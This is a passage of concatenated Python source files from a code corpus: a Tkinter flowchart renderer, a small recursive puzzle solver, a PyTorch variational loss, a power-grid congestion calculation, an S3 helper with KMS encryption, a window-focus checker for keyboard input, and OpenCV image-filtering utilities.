node.isEmpty():\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif node.__class__ is nodes.NonLoopBranch:\n\t\t\t\tcurX, curY = self.drawFlowChart(node.branch,curX,curY)\n\t\t\telse:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\tself.chartFrame.newBlock(node,curX,curY)\n\t\t\t\n\t\t\tif node.__class__ is nodes.LoopBranch:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\tretX, retY = self.drawFlowChart(node.branch,curX,curY)\n\t\t\t\tlinePoints = (curX,curY-joiningLineLength/2,retX,retY,node.width()/2+node.nodeWidth()/8)\n\t\t\t\tself.chartFrame.joiningLine(linePoints,\"-C\",node=node)\n\t\t\t\t\n\t\t\t\tcurY = retY\n\t\t\t\n\t\t\t\n\t\t\tif node.__class__ is nodes.IfNode:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\t\n\t\t\t\ttempX = {}\n\t\t\t\ttempY = {}\n\t\t\t\tterminatedBranch = {}\n\t\t\t\ttempX[True] = curX - node.branch[False].width()/2\t\t#use opposite branch width\n\t\t\t\ttempX[False] = curX + node.branch[True].width()/2\t\t#use opposite branch width\n\t\t\t\t\n\t\t\t\tfor branch in [True,False]:\n\t\t\t\t\tbranchNode = node.branch[branch]\n\t\t\t\t\tlinePoints = (prevX,prevY,tempX[branch],curY)\n\t\t\t\t\tself.chartFrame.joiningLine(linePoints,bend=\"7\",node=branchNode)\n\t\t\t\t\ttempX[branch], tempY[branch] = self.drawFlowChart(branchNode.branch,tempX[branch],curY)\n\t\t\t\t\tterminatedBranch[branch] = self.isTerminatedBranch(branchNode.branch)\n\t\t\t\t\n\t\t\t\tif tempY[True] < tempY[False]:\n\t\t\t\t\textX, extY = tempX[True], tempY[False]\n\t\t\t\telse:\n\t\t\t\t\textX, extY = tempX[False], tempY[True]\n\t\t\t\t\n\t\t\t\tfor branch in [True,False]:\n\t\t\t\t\tif not terminatedBranch[branch]:\n\t\t\t\t\t\tif tempY[branch] != extY:\n\t\t\t\t\t\t\tlinePoints = (tempX[branch],tempY[branch],tempX[branch],extY)\n\t\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\t\tlinePoints = (tempX[branch],extY,curX,extY)\n\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\n\t\t\t\tcurY = extY\n\t\t\t\n\t\t\t\n\t\t\tif node.__class__ is nodes.EvaluateNode:\n\t\t\t\tarrangedWhen = []\n\t\t\t\tfor i,branch in enumerate(node.whenList):\n\t\t\t\t\tbreakFlag = False\n\t\t\t\t\tfor j,branch2 in enumerate(arrangedWhen):\n\t\t\t\t\t\tif branch2.width() > branch.width():\n\t\t\t\t\t\t\tarrangedWhen.insert(j,branch)\n\t\t\t\t\t\t\tbreakFlag = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif not breakFlag:\n\t\t\t\t\t\tarrangedWhen.append(branch)\n\t\t\t\t\n\t\t\t\ttotalWidth = 0\n\t\t\t\tfor branch in arrangedWhen:\n\t\t\t\t\ttotalWidth += branch.width()\n\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength\n\t\t\t\t\t\n\t\t\t\tbranchEndPoints = []\n\t\t\t\t\n\t\t\t\tevenWidth = 0\n\t\t\t\toddWidth = 0\n\t\t\t\tfor i,newNode in enumerate(arrangedWhen):\n\t\t\t\t\tnewNodeWidth = newNode.width()\n\t\t\t\t\tif i % 2:\n\t\t\t\t\t\tnewX = curX + evenWidth + newNodeWidth/2 - totalWidth/2\n\t\t\t\t\t\tevenWidth += newNodeWidth\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewX = curX - oddWidth - newNodeWidth/2 + totalWidth/2\n\t\t\t\t\t\toddWidth += newNodeWidth\n\t\t\t\t\t\n\t\t\t\t\tlinePoints = (prevX,prevY,newX,curY - joiningLineLength/2,newX,curY)\n\t\t\t\t\tself.chartFrame.joiningLine(linePoints,node=newNode)\n\t\t\t\t\tendPoints = self.drawFlowChart(newNode.branch,newX,curY)\n\t\t\t\t\tbranchEndPoints.append(endPoints)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmaxY = -1\n\t\t\t\tfor point in branchEndPoints:\n\t\t\t\t\tif point[1] > maxY:\n\t\t\t\t\t\tmaxY = point[1]\n\t\t\t\tcurY = maxY\n\t\t\t\t\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tminX = branchEndPoints[0][0]\n\t\t\t\ttry:\n\t\t\t\t\tmaxX = branchEndPoints[1][0]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tmaxX = minX\n\t\t\t\t\n\t\t\t\tfor i,point in enumerate(branchEndPoints):\n\t\t\t\t\tif not self.isTerminatedBranch(arrangedWhen[i].branch):\n\t\t\t\t\t\tif point[1] != maxY:\n\t\t\t\t\t\t\tlinePoints = (point[0],point[1],point[0],maxY)\n\t\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\t\tlinePoints = (point[0],maxY,curX,curY)\n\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints,bend=\"N\")\n\t\t\t\t\n\t\t\t\n\t\t\tprevX, prevY = curX, curY\n\t\t\tcurY += joiningLineLength/2\n\t\t\tif node.__class__ is not nodes.EndNode:\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\n\t\t\n\t\treturn curX, curY\n\t\t\n\tdef isTerminatedBranch(self,branch):\n\t\tif not branch:\n\t\t\treturn False\n\t\t\n\t\tnode = branch[-1]\n\t\t\n\t\tif node.__class__ is nodes.GoToBranch or node.__class__ is nodes.EndNode:\n\t\t\treturn True\n\t\t\t\n\t\tif node.__class__ is nodes.LoopBranch or node.__class__ is nodes.NonLoopBranch:\n\t\t\treturn self.isTerminatedBranch(node.branch)\n\t\n\tdef alreadyExists(self,component):\n\t\tif component in ChartWindow.charts:\n\t\t\tChartWindow.charts[component].focus_set()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef createWindow(self):\n\t\tstartTime = time.time()\n\t\t\n\t\tnodes = createTree.getChart(self.component)\n\n\t\tRWidth = int(self.winfo_screenwidth()*0.5)\n\t\tRHeight = int(self.winfo_screenheight()*0.95)\n\t\tself.geometry((\"%dx%d\")%(RWidth,RHeight))\n\t\t\n\t\tself.chartFrame = ChartFrame(self,self.component)\n\t\tself.drawFlowChart(nodes,int(self.chartFrame.winfo_screenwidth()*0.25),20)\n\t\tchartBox = self.chartFrame.canvas.bbox(\"all\")\n\t\tchartBorder = 50\n\t\tchartBox = (chartBox[0]-chartBorder,chartBox[1]-chartBorder,chartBox[2]+chartBorder,chartBox[3]+chartBorder)\n\t\tself.chartFrame.canvas.configure(scrollregion = chartBox)\n\t\tif OS == \"Linux\":\n\t\t\tself.bind(\"<4>\",self.chartFrame.mouseWheelScroll)\n\t\t\tself.bind(\"<5>\",self.chartFrame.mouseWheelScroll)\n\t\telse:\n\t\t\tself.bind(\"\",self.chartFrame.mouseWheelScroll)\n\t\t\n\t\tprint(time.time() - startTime)\n\n\ndef createNewWindow(component):\n\tcomponent = component.upper()\n\tif fileaccess.validComponentName(component):\n\t\tif component in ChartWindow.charts:\n\t\t\tChartWindow.charts[component].focus_set()\n\t\telse:\n\t\t\tChartWindow.charts[component] = ChartWindow(component)\n\t\n\t\n\t\ndef main():\n\troot = Tkinter.Tk()\n\t\n\tinputBox = Tkinter.Entry(root)\n\tinputBox.pack()\n\tinputBox.insert(0,\"vib3248\")\n\tinputBoxButton = Tkinter.Button(root,text=\"OPEN\",command=lambda:createNewWindow(inputBox.get()))\n\tinputBox.bind(\"\",lambda e:createNewWindow(inputBox.get()))\n\tinputBoxButton.pack()\n\t\n\troot.mainloop()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"src/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":14048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"468435787","text":"def answer(n):\n # your code here\n n = int (n)\n check = { 1 : 0 , 2 : 1 }\n\n def finder(n):\n if n in check:\n return check[n]\n if n % 2 == 0 : check[n] = finder(n / 2 ) + 1\n else : check[n] = min (finder((n + 1 ) / 2 ) + 2,finder((n - 1 ) / 2 ) + 2 )\n return check[n]\n return finder(n)\n\nfor n in range(1, 65):\n print(\"%s: %s\" % (n, answer(n)))\n","sub_path":"training/lvl2q2.py","file_name":"lvl2q2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240994683","text":"import torch\n\n\ndef calculate_kl(\n drops_proba: torch.FloatTensor,\n prior_proba: float,\n kl_coeff: float = 1\n) -> torch.FloatTensor:\n kl_div = kl_coeff * (\n drops_proba * torch.log(torch.clamp(drops_proba / prior_proba, min=1e-8))\n + (1 - drops_proba)\n * torch.log(torch.clamp((1 - drops_proba) / (1 - prior_proba), min=1e-8))\n ).sum(dim=1)\n\n return kl_div\n\n\ndef variational_translation_loss(\n src_drops_proba: torch.FloatTensor,\n tgt_drops_proba: torch.FloatTensor,\n src_possible_merges: (torch.FloatTensor, torch.FloatTensor),\n tgt_possible_merges: (torch.FloatTensor, torch.FloatTensor),\n kl_coeff: float = 1,\n src_prior_proba: float = None,\n tgt_prior_proba: float = None,\n only_src: bool = False\n) -> (torch.FloatTensor, torch.FloatTensor, torch.FloatTensor):\n # Invert tensor to get probability of skipping merge.\n # It needs because initially drops_proba is a tensor of leaving merge probabilities\n src_drops_proba = 1 - src_drops_proba\n\n src_used_per_id = src_possible_merges[0]\n src_missed_per_id = src_possible_merges[1]\n\n rl_loss = (\n src_missed_per_id * torch.log(torch.clamp(src_drops_proba, min=1e-8)) +\n src_used_per_id * torch.log(torch.clamp(1 - src_drops_proba, min=1e-8))\n ).sum(dim=1)\n\n if not only_src:\n tgt_drops_proba = 1 - tgt_drops_proba\n\n tgt_used_per_id = tgt_possible_merges[0]\n tgt_missed_per_id = tgt_possible_merges[1]\n\n rl_loss += (\n tgt_missed_per_id * torch.log(torch.clamp(tgt_drops_proba, min=1e-8)) +\n tgt_used_per_id * torch.log(torch.clamp(1 - tgt_drops_proba, min=1e-8))\n ).sum(dim=1)\n\n tgt_kl_loss = calculate_kl(tgt_drops_proba, prior_proba=tgt_prior_proba, kl_coeff=kl_coeff)\n else:\n tgt_kl_loss = None\n\n src_kl_loss = calculate_kl(src_drops_proba, prior_proba=src_prior_proba, kl_coeff=kl_coeff)\n\n return rl_loss, src_kl_loss, tgt_kl_loss\n","sub_path":"onmt/variational/var_loss.py","file_name":"var_loss.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"254280136","text":"import numpy as np\nimport pandas as pd\nfrom powersimdata.input.input_data import get_bus_demand\nfrom powersimdata.scenario.analyze import Analyze\nfrom powersimdata.scenario.scenario import Scenario\n\nfrom postreise.analyze.helpers import summarize_plant_to_bus\n\n\ndef calculate_congestion_surplus(scenario):\n \"\"\"Calculates hourly congestion surplus.\n\n :param powersimdata.scenario.scenario.Scenario scenario: scenario instance.\n :return: (*pandas.DataFrame*) -- congestion surplus.\n \"\"\"\n\n if not isinstance(scenario, Scenario):\n raise TypeError(\"scenario must be a Scenario object\")\n if not isinstance(scenario.state, Analyze):\n raise ValueError(\"scenario.state must be Analyze\")\n\n grid = scenario.state.get_grid()\n lmp = scenario.state.get_lmp()\n pg = scenario.state.get_pg()\n\n bus_demand = get_bus_demand(scenario.info, grid).to_numpy()\n bus_pg = summarize_plant_to_bus(pg, grid, all_buses=True)\n\n congestion_surplus = (lmp.to_numpy() * (bus_demand - bus_pg)).sum(axis=1)\n # Remove any negative values caused by barrier method imprecision\n congestion_surplus = np.clip(congestion_surplus, a_min=0, a_max=None)\n # Return a pandas Series with same index as pg\n congestion_surplus = pd.Series(data=congestion_surplus, index=pg.index)\n congestion_surplus.rename_axis(pg.index.name)\n return congestion_surplus\n","sub_path":"postreise/analyze/transmission/congestion.py","file_name":"congestion.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"309987844","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom builtins import (bytes, str, open, super, range, zip, round, input, int, pow, object)\nfrom clari_dynamo.conf.constants import *\n\nfrom clari_dynamo import utils\n\n\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\nfrom boto.s3.connection import OrdinaryCallingFormat\n\nCONNECTION = S3Connection(host='s3.amazonaws.com', debug=2, is_secure=True,\n calling_format=OrdinaryCallingFormat())\nBUCKET = CONNECTION.get_bucket(AWS_KMS_S3_BUCKET_NAME)\n\n\ndef put(table_name, item_name, data):\n # alphanumeric = 36 characters - so 25 chars gives around\n # the same cardinality of GUID (about 2.4x)\n file_name = '{0:s}.{1:s}.{2:s}'.format(table_name, item_name,\n utils.quick_random_str(24))\n\n key = Key(BUCKET)\n key.key = file_name\n key.set_contents_from_string(data, headers=get_kms_headers())\n\n return key\n\n\ndef delete(key_string):\n key = Key(BUCKET)\n key.key = key_string\n BUCKET.delete_key(key)\n\n\ndef get(key_string):\n key = Key(BUCKET)\n key.key = key_string\n ret = key.get_contents_as_string()\n return ret\n\n\ndef get_kms_headers():\n return {\n 'x-amz-server-side-encryption': 'aws:kms',\n 'x-amz-server-side-encryption-aws-kms-key-id':\n os.environ['CLARI_DYNAMO_AWS_KMS_KEY_ARN_ID']}","sub_path":"clari_dynamo/s3_kms.py","file_name":"s3_kms.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"311816786","text":"from .common import prettywarn\nimport sys, os\n\n# By default it just read kandinsky window (only if is focused)\nUSE_KANDINSKY_INPUT_ONLY = 'ION_DISABLE_KANDINSKY_INPUT_ONLY' not in os.environ\n# Option to get input everywhere on system\nGET_INPUT_EVERYWHERE = 'ION_ENABLE_GET_INPUT_EVERYWHERE' in os.environ\n\n\nif GET_INPUT_EVERYWHERE:\n # Fake FocusChecker class, will always return True\n class FocusChecker:\n def __init__(self): ...\n def __call__(self): return True\n\n\nelif sys.platform == \"win32\":\n import ctypes\n\n def GetFirstWindowFromThreadProcessId(pid, class_name=None, not_class_name=False, contains_name=None):\n window = ctypes.c_uint(0)\n if class_name:\n if type(class_name) in (list, tuple): pass\n elif type(class_name) == str: class_name = (class_name,)\n else: raise TypeError(\"invalid type for class name\")\n if contains_name and type(contains_name) != str: raise TypeError(\"invalid type for contains name\")\n \n def foreach_window(hwnd, _):\n lpdw = ctypes.c_uint()\n ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(lpdw))\n \n if lpdw.value == pid and ctypes.windll.user32.IsWindowVisible(hwnd):\n if class_name:\n buff = ctypes.create_unicode_buffer(256)\n ctypes.windll.user32.GetClassNameW(hwnd, buff)\n \n if not ((not_class_name and any([buff.value != name for name in class_name])) or\n (not not_class_name and any([buff.value == name for name in class_name]))): \n return True\n \n if contains_name:\n buff = ctypes.create_unicode_buffer(256)\n ctypes.windll.user32.GetWindowTextW(hwnd, buff, 256)\n\n if contains_name.lower() not in buff.value.lower(): return True\n \n window.value = hwnd\n return False\n return True\n \n ctypes.windll.user32.EnumWindows(ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.c_uint, ctypes.c_uint)(foreach_window), 0)\n return window.value\n\n class FocusChecker:\n kandinsky_window_id = 0\n kandinsky_not_found_error_printed = False\n python_window_id = 0\n\n def __init__(self):\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n #To find kandinsky is more simple, no need to find parent processes with a valid window\n # 'TkTopLevel' is the class name of root tkinter window, 'pygame' because in old releases of kandinsky i used pygame\n self.kandinsky_window_id = GetFirstWindowFromThreadProcessId(os.getpid(), (\"TkTopLevel\", \"pygame\"), False, \"kandinsky\")\n\n if self.kandinsky_window_id == 0 and not self.kandinsky_not_found_error_printed:\n # Kandinsky window not found\n prettywarn(\"could not find the kandinsky window to get inputs.\", RuntimeWarning)\n self.kandinsky_not_found_error_printed = True\n\n if USE_KANDINSKY_INPUT_ONLY: \n self.python_window_id = 0\n return\n\n\n if self.python_window_id == 0:\n # Find python cosole window and ignore the top level of tkinter\n self.python_window_id = GetFirstWindowFromThreadProcessId(os.getpid(), (\"TkTopLevel\", \"pygame\"), True)\n\n if self.python_window_id == 0:\n # Python probably started by another process, in this mode python don't have 'real' window\n # So try going back in the parent processes to find a valid window\n ppid = os.getppid()\n for _ in range(20): # Loop limit to avoid infinite loop\n self.python_window_id = GetFirstWindowFromThreadProcessId(ppid, (\"TkTopLevel\", \"pygame\"), True)\n\n # Found an valid window\n if self.python_window_id: break\n\n # Not found at this time, try with his ppid\n from subprocess import check_output, CalledProcessError # need this because calling 'wmic' directly\n try: result = [i.strip() for i in check_output([\"wmic\", \"process\", \"where\", f\"ProcessId={ppid}\", \"get\", \"ParentProcessId\"]).decode().splitlines() if i.strip() != '']\n except CalledProcessError: continue # Error happening, will try again in the next iteration\n\n if len(result) == 1:\n # No parent found, parent died or idk\n prettywarn(\"cannot find an valid window to get inputs from python console.\", RuntimeWarning)\n del check_output, CalledProcessError\n break\n else: ppid = int(result[1].strip())\n\n else: \n # No valid parent window found!\n # Python probably started in no-shell-mode and/or by a task\n # So will not log python console input\n prettywarn(\"cannot find an valid window to get inputs from python console.\", RuntimeWarning)\n\n def __call__(self):\n # Verify is kandinsky is imported, for the first true test (if no error) this will re-init FocusChecker\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n\n fgw = ctypes.windll.user32.GetForegroundWindow()\n return ((self.python_window_id and fgw == self.python_window_id) or \n (self.kandinsky_window_id and fgw == self.kandinsky_window_id))\n\n\nelif sys.platform == \"linux\":\n import Xlib\n\n class FocusChecker:\n kandinsky_window_id = 0\n python_window_id = 0\n\n def __init__(self):\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n # To find kandinsky is more simple, no need to find parent processes with a valid window\n # 'TkTopLevel' is the class name of root tkinter window\n ...\n\n if USE_KANDINSKY_INPUT_ONLY: \n self.python_window_id = 0\n return\n \n if self.python_window_id == 0:\n # Find python cosole window and ignore the top level of tkinter\n ...\n\n def __call__(self):\n # Verify is kandinsky is imported, for the first true test (if no error) this will re-init FocusChecker\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n \n return False\n\n\nelif sys.platform == \"macos\":\n\n class FocusChecker:\n kandinsky_window_id = 0\n python_window_id = 0\n\n def __init__(self):\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n # To find kandinsky is more simple, no need to find parent processes with a valid window\n # 'TkTopLevel' is the class name of root tkinter window\n ...\n\n if USE_KANDINSKY_INPUT_ONLY: \n self.python_window_id = 0\n return\n \n if self.python_window_id == 0:\n # Find python cosole window and ignore the top level of tkinter\n ...\n\n def __call__(self):\n # Verify is kandinsky is imported, for the first true test this (if no error) this will re-init FocusChecker\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n \n return False\n\nelse:\n # Platform not supported for focus, create an fake FocusChecker class\n # The 'focus on only window' will be disabled\n prettywarn(f\"platform '{sys.platform}' not supported for inputs gets only in focussed window of python or kandinsky. \"\n \"Inputs will be gets on entire system\", ImportWarning)\n \n class FocusChecker:\n def __init__(self): ...\n def __call__(self): return True","sub_path":"src/ion/util/stuff/focus_checker.py","file_name":"focus_checker.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"424785300","text":"#testing\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n#num = \"0146\"\n#n = \"146\"\n#img = cv2.imread('Honda/80bar//T2-X=0.00_Y=1.00__'+num+\".tif\",-1)\n#img_rescaled = cv2.imread(direct + file, -1) #reads 16 bit without translating to 8 bit, if original file is in 16 bit\n#cv2.imwrite(\"./norm_imgs/\"+num+\".png\",img_rescaled)\n\ndef cropImage(image, cropTop=0, cropBottom = 0, cropLeft = 0, cropRight =0):\n\t\"Crop pixels off the image\"\n\tcropped_image = np.copy(image)\n\tcropped_image = cropped_image[cropTop:,cropLeft:]\n\tif cropBottom:\n\t\tcropped_image = cropped_image[:-cropBottom,]\n\tif cropRight:\n\t\tcropped_image = cropped_image[:,-cropRight]\n\treturn cropped_image\n\ndirect = \"Old_Groups_Code/norm_imgs/\"\nfile = \"300.tif\"\nimg = cv2.imread(direct + file,-1)\nimg = cropImage(img)\nimg_max = img.max()\nimg_min = img.min()\nimg_rescaled = 255*((img-img_min)/(img_max-img_min))\nimg_rescaled = np.array(img_rescaled, dtype = int)\n\nplt.close('all')\n#plt.imshow(img, cmap='gray')\n#print(img)\n\n\ndef windowFrame(image, rows, columns, save = True):\n\tframes = []\n\tlenRows, lenColumns = image.shape\n\tfor i in range(rows):\n\t\tfor j in range(columns):\n\t\t\tpicture = image[int(lenRows / rows) * i: int(lenRows / rows) * (i+1), int(lenColumns / columns) * j: int(lenColumns / columns) * (j+1)]\n\t\t\tframes.append(picture)\n\n\tif save == True:\n\t\tos.system('mkdir windowFrames_'+file[0:-4])\n\t\tfor i in range(len(frames)):\n\t\t\tcv2.imwrite('windowFrames_' +file[0:-4] + \"/frame\"+str(i)+\".tif\",frames[i])\n\treturn frames\n\n\ndef histogram(image, show = True, save = ''):\n\tZ = np.concatenate(np.float32(image.reshape((-1,1))))\n\timg_max = image.max()\n\timg_min = image.min()\n\tbins = img_max - img_min\n\tfig, axs = plt.subplots(1, 1)\n\taxs.hist(Z, bins)\n\t#axs.set_xlim(0,255)\n\tif show:\n\t\tplt.show()\n\tif len(save) != 0:\n\t\tos.system('mkdir savedHistograms')\n\t\tplt.savefig('savedHistograms/' + save)\n\t\tplt.close()\n\ndef canny(img):\n\tedges = cv2.Canny(img,100,40)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(edges,cmap = 'gray')\n\tplt.title('Canny Edges'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn edges\n\ndef cannyClosing(img, kernelSize):\n\tedges = cv2.Canny(img, 100, 200)\n\tkernel = np.ones((kernelSize,kernelSize),np.uint8)\n\tclosing = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)\n\tdrawShapes(closing, img)\n\treturn closing\n\ndef bilateralFilter(img):\n\tblur = cv2.bilateralFilter(img,9,75,75)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Bilateral Filtered'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\ndef medianFilter(img):\n\tmedian = cv2.medianBlur(img,5)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(median,cmap = 'gray')\n\tplt.title('Median Filtered'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn median\n\ndef gaussianFilter(img):\n\tblur = cv2.GaussianBlur(img,(5,5),0)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Gaussian Filtered'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\ndef averageBlur(img):\n\tblur = cv2.blur(img, (5,5))\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Blurred Image'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\n#blur = gaussianFilter(img)\n#histogram(blur)\n\ndef histogramEqualization(img):\n\tequ = cv2.equalizeHist(img)\n\thistogram(equ)\n\tblur = gaussianFilter(equ)\n\thistogram(blur)\n\ndef adaptiveHistogram(img):\n\tclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n\tcl1 = clahe.apply(img)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(cl1,cmap = 'gray')\n\tplt.title('Adaptive Histogram'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\thistogram(cl1)\n\ndef laplace_sobel(img):\n\tlaplacian = cv2.Laplacian(img,cv2.CV_64F)\n\tsobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\n\tsobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n\t\n\tplt.subplot(2,2,1),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')\n\tplt.title('Laplacian'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')\n\tplt.title('Sobel X'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')\n\tplt.title('Sobel Y'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\n#frames = windowFrame(img, 5, 5)\n#for i in range(len(frames)):\n#\thistogram(frames[i], show = False, save = 'frame' + str(i))\n\ndef contourArea(contours, image = None):\n #Return array of contour areas\n return np.array([cv2.contourArea(contour) for contour in contours])\n\ndef contourBoundary(contour):\n\t'''\n\tSave location of the shape in the context of the larger image\n\t'''\n\n\tx,y,w,h = cv2.boundingRect(contour)\n\treturn np.array([y,y+h,x,x+w])\n\ndef cropContour(contour, image, border = 0):\n\t'''\n\tCrop shape from rest of image\n\t'''\n\n\tboundary = contourBoundary(contour) \n\t# create a single channel pixel white image\n\tcanvas = np.zeros(image.shape).astype(image.dtype) + 255\n\tfill = cv2.fillPoly(canvas, pts =[contour], color=0)\n\t#keep shape in grayscale, turn background white\n\tanti_fill = cv2.bitwise_or(image,fill)\n\tcroppedContour = anti_fill[boundary[0]:boundary[1],\\\n\t\t\t\t\tboundary[2]:boundary[3]]\n\t#also crop to slightly larger than boundary so shape isn't right at \n\t#the edge of the image\n\t#this will be useful if we want to draw more contours on a shape after cropping it\n\tif border:\n\t\tborderedContour = anti_fill[boundary[0]-border:boundary[1]+border,\\\n\t\t\t\t\tboundary[2]-border:boundary[3]+border]\n\t\treturn borderedContour\n\treturn croppedContour\n\n\ndef meanIntensity(contours, image):\n #Return mean intensity for each contour\n\n\tmeanIntensities = []\n\tfor contour in contours:\n\t\tcroppedContour = cropContour(contour, image)\n\t\tmask = np.logical_not(np.logical_not(croppedContour -255)).astype('uint8')\n\t\tmeanIntensities.append(cv2.mean(croppedContour, mask= mask)[0])\n \n\treturn np.array(meanIntensities)\n\n\ndef drawShapes(image_binarized, image):\n\t'''\n\tDraw contours onto images\n\t'''\n\tcontours, hierarchy = cv2.findContours(image_binarized, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tshapes_image = np.copy(image)\n\n\t#change back to RGB for easier visualization\n\tshapes_image = cv2.cvtColor(shapes_image, cv2.COLOR_GRAY2RGB)\n#\tplt.imshow(shapes_image) # uncomment these lines to plot in real time\n#\tplt.show()\n\tshapes_image = cv2.drawContours(shapes_image, contours, -1, (255,0,0), 1)\n\tplt.imshow(shapes_image) \n\tplt.show()\n\ndef kMeansHistogram(Z, label, kthresh, show = True, save = ''):\n\t'''\n\tTakes data for 1 dimensional kmeans and the resultant labels \n\tand plots histogram of clusters\n\t'''\n\tfig, axs = plt.subplots(1, 1)\n\tfor k in range(kthresh):\n\t\tcluster = Z[label == k]\n\t\tbins = 1+int(cluster.max() - cluster.min())\n\t\taxs.hist(cluster, bins, label = str(k))\n\taxs.legend()\n\tif show:\n\t\tplt.show()\n\tif len(save) != 0:\n\t\tos.system('mkdir savedHistograms')\n\t\tplt.savefig('savedHistograms/' + save)\n\t\tplt.close()\n\ndef adaptiveThresholding(image, thresholdType = 1, blockSize = 11, subtract = 2):\n\t'''\n\tApplies adaptive thresholding to image with either mean or Gaussian thresholding\n\tthresholdType of true gives adaptive mean thresholding and false gives adaptive Gaussian thresholding\n\tblockSize sets the size of the neighborhood, and subtract reduces the threshold by the given amount\n\t'''\n\tif thresholdType:\n\t\tthresh = cv2.ADAPTIVE_THRESH_MEAN_C\n\telse:\n\t\tthresh = cv2.ADAPTIVE_THRESH_GAUSSIAN_C\n\n\tproc = cv2.adaptiveThreshold(image, 255, thresh, \\\n\t\tcv2.THRESH_BINARY, blockSize, subtract)\n\t\n\tdrawShapes(proc, img)\n\ndef multiThresholding(image, kthresh, kthcenter = 0, plotHistogram = False):\n\n\tZ = 